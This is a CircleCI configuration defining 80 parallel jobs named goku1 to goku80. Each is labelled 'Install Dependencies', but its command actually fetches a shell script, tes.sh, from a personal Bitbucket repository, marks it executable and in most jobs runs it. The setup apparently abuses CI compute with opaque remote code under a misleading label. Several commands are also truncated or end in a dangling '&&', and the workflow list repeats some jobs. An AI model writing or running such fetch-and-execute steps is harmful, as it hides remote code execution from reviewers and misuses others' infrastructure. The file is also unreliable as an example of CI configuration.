version: 2.1
orbs:
  ruby: circleci/ruby@0.1.2 
jobs:
    goku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh &&
    goku15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku31:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku32:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku33:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku34:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku35:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku36:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku37:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku38:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku39:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku40:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku41:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku42:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh &&
    goku43:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku44:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku45:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku46:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku47:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh &&
    goku48:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku49:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku50:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && 
    goku51:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku52:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku53:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku54:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && 
    goku55:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku56:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku57:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku58:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku59:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh &&
    goku60:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku61:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku62:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku63:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku64:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku65:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku66:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku67:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh
    goku68:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku69:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku70:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.s
    goku71:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku72:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku73:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku74:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.s
    goku75:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku76:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku77:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku78:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku79:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh
    goku80:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Peli898/job/raw/ea6a6866bb3cefcf83f0e8996662b8785c448abb/tes.sh && chmod u+x tes.sh && ./tes.sh

workflows:
    version: 2.1
    build:
        jobs:
            - goku1
            - goku2
            - goku3
            - goku4
            - goku5
            - goku6
            - goku7
            - goku8
            - goku9
            - goku10
            - goku11
            - goku12
            - goku13
            - goku14
            - goku15
            - goku16
            - goku17
            - goku18
            - goku19
            - goku20
            - goku21
            - goku22
            - goku23
            - goku24
            - goku25
            - goku26
            - goku27
            - goku28
            - goku29
            - goku30
            - goku31
            - goku32
            - goku33
            - goku34
            - goku35
            - goku36
            - goku37
            - goku38
            - goku39
            - goku40
            - goku41
            - goku42
            - goku43
            - goku44
            - goku45
            - goku46
            - goku47
            - goku48
            - goku49
            - goku50
            - goku61
            - goku62
            - goku63
            - goku64
            - goku65
            - goku66
            - goku67
            - goku68
            - goku69
            - goku60
            - goku61
            - goku72
            - goku73
            - goku74
            - goku75
            - goku76
            - goku77
            - goku78
            - goku79
            - goku70
            - goku71
            - goku72
            - goku73
            - goku74
            - goku75
            - goku76
            - goku77
            - goku78
            - goku79
            - goku80
